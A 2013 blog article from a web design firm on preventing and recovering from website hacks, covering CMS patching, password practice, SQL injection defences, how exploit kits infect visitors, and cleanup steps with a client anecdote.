Website Hacking and Prevention
Part 2: Prevention & Recovery
How do I secure my website from attacks?
Although no website is 100% secure, there are many steps that can be taken to ensure your site is guarded from the vast majority of threats. Firstly, if you are using a CMS for your website, be sure to check regularly for patches and updates the company releases. In some cases it will be a good idea to upgrade your CMS to a newer version of the system. (ie Joomla 1.1 vs Joomla 2.5) Though it may require a more experienced web developer to migrate your existing site to an upgraded CMS, but the effort is worth the payoff. Versions of CMS's that have been around for a few years and have known vulnerabilities WILL be exploited if they are not patched or upgraded. Hackers count on users and web administrators neglecting to upgrade and patch their software and the security updates that come with doing so.
Secure usernames and passwords are also crucial. Default usernames such as "admin" should be changed to something unique and passwords should combine lower and uppercase letters as well as numerical values and special characters. Using default usernames and / or passwords will dramatically increase the odds of an automated system "guessing" or cracking into your account.
Often there will be an option in your CMS to use database "tableprefixes". Systems like Wordpress use a standard naming convention for the tables containing data in the database. Using a table prefix will prepend a string of your choosing to the beginning of the name of every table created in that database. (ex. usernames vs mysite_usernames). Doing this ensures that your database isn't using the default naming conventions and it could mean the difference between a SQL injection extracting your data or failing to retrieve anything.
To protect your website from SQL injections in general, your Developer or DBA (Database Administrator) should be familiar with best practices for security. This includes things like "sanitizing" any data that the database receives from your website from input fields by using both client and serverside form validation. There are several techniques for achieving this whenever a website user is allowed to request information from your database. This may include using prepared statements, paramaterized queries, or stored procedures depending on your specific configuration. In any case, the important thing is to implement some kind of barrier between your website and database. Ensuring YOU are in control the of any request for data and not the person or robot on the outside.
At Back2Front, we use a system that includes these best practices. We also offer our clients with databasedriven websites a means of updating the contents of that database themselves if they choose. Likewise, checks and safeguards are in place that not only ensure data is retrieved in a controlled manner, but also properly formatted when it is entered in the first place. The result being a highly regulated datastructure that maximizes efficiency and security while minimizing any chance of intrusion.
Am I a target?
When it comes to securing your website, one aspect can be easily overlooked. Even if you have put every possible safeguard in place to ensure your website isn't forcibly hacked into, there is no way to protect it from someone who has obtained your username and password. As discussed above, when a website is hacked it is most often done as a means to direct people to viruses that infect your computer. These viruses may have a variety of different purposes, however a common theme is that they are used to mine for various types of credentials stored on your machine. This may include anything from banking login information, to information about your computer, or in this case the FTP (File Transfer Protocol) login information you use to login and manage your website. Have you ever locked your door but accidentally left the key in the keyhole? Similarly, securing your website is important, but there's nothing to stop someone with the key from just walking in the front door.
Website hacking and the spread of computer viruses work in a cyclical way. Hacked sites direct users to viruses, users infected with these viruses often provide cybercriminals the means to hack more websites through FTP login credentials, CMS admin credentials, or in many cases email login credentials. Keeping this information secure is just as important as keeping the website itself secure. For this reason you may consider not storing this kind of information on your machine or in an email and simply opt to write them down.
Not every user that visits a hacked website will have their computer infected. In fact the majority of users will likely not have a problem. In the background, code injected into a hacked site will run and direct the computer to the culprit's malicious content hosted elsewhere. Generally this is in the form of an "exploit kit", which receives basic information about the user like the type of operating system and browser running. Based on this information, it will decide what "exploit" to use that came packaged in the kit. An exploit is a means of infecting a user based on known weaknesses in their specific system. For example, someone viewing a hacked site using Internet Explorer 7 will be sent a virus using one exploit, while a user running Firefox another. The likelihood of your being infected depends on how many exploits are being used in the kit, and how exploitable your operating system and browser are. In either case, you will usually be asked to install something (often disguising itself as something legitimate like an update), which is in fact a virus.
To safeguard your machine, common sense practices go a long way. Firstly, if you are using email and browsing the internet, antivirus software is a must. There are free and a licensed antivirus programs available depending on what level of security you require. Whether using a free antivirus application, or one you purchased for personal or business use, installing updates and patches regularly is highly recommended. Likewise, upgrading the webbrowser you use is very important as well. This is your first line of defence against infection. The vast majority of infections occur from vulnerabilities in a small handful of applications or platforms. The most common being Internet Explorer 7, Firefox, as well as weaknesses in Adobe Acrobat Reader 9, Flash, Quicktime, and Java platform applications / plugins. If you use any of these browsers or plugins it is important, again, to install updates and patches as soon as they are released to minimize your risk. When doing so however, be critical of where the update is coming from and only install something coming from an official source. (ie www.adobe.com/updates NOT www.thepluginpeople.com/adobe) Also, if you run a business with many office computers, having them run outdated or vulnerable software with known security issues should be discouraged.
My website was hacked, what now?
There are plenty of online resources to guide you through the process of recovering your
your hacked website, but there are general steps that should be followed:
- Contact / inform your hosting company.
- Quarantine your site.
- Assess the damage.
- Identify the vulnerability.
- Clean and maintain your site.
It is always good practice to backup your website. If you are using a CMS, there may be a built in option to backup your website periodically. If you or your developer are having problems identifying or removing the malicious content, it may be easiest to simply restore the website to an earlier backup version. This does not guarantee you will not be hacked again, but is a possible fallback option.
If your site has been hacked, you may see a warning displayed before entering the website. Google has systems in place which scan the internet for sites hosting malware or spam content. When such a site is identified, google will warn users before entering of the dangers associated with proceeding. Though it is not guaranteed that your computer will become infected by doing so, it is NOT recommended you open infected pages in your web browser. Diagnostic tools such as Wget and cURL are available for helping identify what damage has been done to the website without putting your machine at risk. Once your site has been diagnosed and cleaned, you may request Google review the site and remove the warning. The majority of this process can be done using Google Webmaster Tools. For a full step by step guide to getting your site back up and running visit http://www.google.com/webmasters/hacked.
Recently at Back2Front, we received a call from a concerned business owner who was informed by a client that her website was displaying a malware warning. Her web developer was out of town on vacation, and she needed help with this immediately. After providing us with the necessary login information, and adding us as a user on her Google Analytics account we quickly discovered the issue. The website was built on an earlier version of the Joomla CMS platform which has known vulnerabilities in security. We promptly removed the injected code and files from the web host, then submitted a request to Google to review the site for Malware using the features in Google Webmaster tools. Within a few hours, Google had reviewed the site and removed the warning. We recommended the business owner upgrade her CMS to a more secure version to protect against similar attacks in the future.
In this article we have outlined many of the "hows" and "whys" of website hacking and hopefully demystified the subject to some degree. With Google reporting upwards of 10,000 new websites hosting malware being found each day, it is clearly a widespread issue that web builders and users alike need to consider. Education and taking a secure approach to technology going forward will help ensure the internet continues to be something we can truly rely on every day.
Links / Sources
By Mark Davidson, Back2Front - The Web Site People. May 2013